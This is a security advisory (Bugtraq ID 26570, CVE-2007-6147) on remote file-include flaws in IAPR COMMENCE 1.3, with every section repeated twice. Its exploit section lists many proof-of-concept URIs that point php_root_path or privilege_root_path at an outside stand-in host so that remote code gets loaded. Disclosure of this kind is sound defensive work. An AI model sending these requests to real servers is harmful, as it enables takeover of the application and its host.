IAPR COMMENCE Multiple Remote File Include Vulnerabilities
BID:26570
Info
IAPR COMMENCE Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 26570 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6147 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 25 2007 12:00AM |
| Updated: | Dec 18 2007 08:04PM |
| Credit: | ShAy6oOoN discovered these vulnerabilities. |
| Vulnerable: |
IAPR COMMENCE IAPR COMMENCE 1.3 |
| Not Vulnerable: | |
Discussion
IAPR COMMENCE Multiple Remote File Include Vulnerabilities
IAPR COMMENCE is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect IAPR COMMENCE 1.3; other versions may also be vulnerable.
IAPR COMMENCE is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
These issues affect IAPR COMMENCE 1.3; other versions may also be vulnerable.
Exploit / POC
IAPR COMMENCE Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/Commence/includes/db_connect.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/includes/include_all_fns.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/includes/main_fns.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/includes/output_fns.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/includes/user_authen_fns.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/admin/includes/include_all_fns.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/include_all_phase.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/phase1.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/phase2.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/phase3.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/phase4.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/phasebase.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/includes/page_includes/page.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/includes/page_includes/pagebase.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/includes/include_all_fns.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/include_all_phase.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/includes/page_includes/pagebase.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phase1.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phase2.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phase3.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phase4.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phasebase.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/user/phase/include_all_phase.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/user/phase/phase1.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/user/phase/phase2.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/user/phase/phase3.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/user/phase/phase4.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/user/phase/phasebase.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/phase1.php?privilege_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/phase2.php?privilege_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/phase3.php?privilege_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/phase4.php?privilege_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phase1.php?privilege_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phase2.php?privilege_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phase3.php?privilege_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phase4.php?privilege_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phase4.php?privilege_root_path=http://www.example2.com
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/Commence/includes/db_connect.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/includes/include_all_fns.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/includes/main_fns.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/includes/output_fns.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/includes/user_authen_fns.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/admin/includes/include_all_fns.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/include_all_phase.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/phase1.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/phase2.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/phase3.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/phase4.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/phasebase.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/includes/page_includes/page.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/includes/page_includes/pagebase.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/includes/include_all_fns.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/include_all_phase.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/includes/page_includes/pagebase.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phase1.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phase2.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phase3.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phase4.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phasebase.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/user/phase/include_all_phase.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/user/phase/phase1.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/user/phase/phase2.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/user/phase/phase3.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/user/phase/phase4.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/user/phase/phasebase.php?php_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/phase1.php?privilege_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/phase2.php?privilege_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/phase3.php?privilege_root_path=http://www.example2.com
http://www.example.com/Commence/admin/phase/phase4.php?privilege_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phase1.php?privilege_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phase2.php?privilege_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phase3.php?privilege_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phase4.php?privilege_root_path=http://www.example2.com
http://www.example.com/Commence/reviewer/phase/phase4.php?privilege_root_path=http://www.example2.com
Solution / Fix
IAPR COMMENCE Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
IAPR COMMENCE Multiple Remote File Include Vulnerabilities
References:
References:
- IAPR COMMENCE Homepage (IAPR COMMENCE)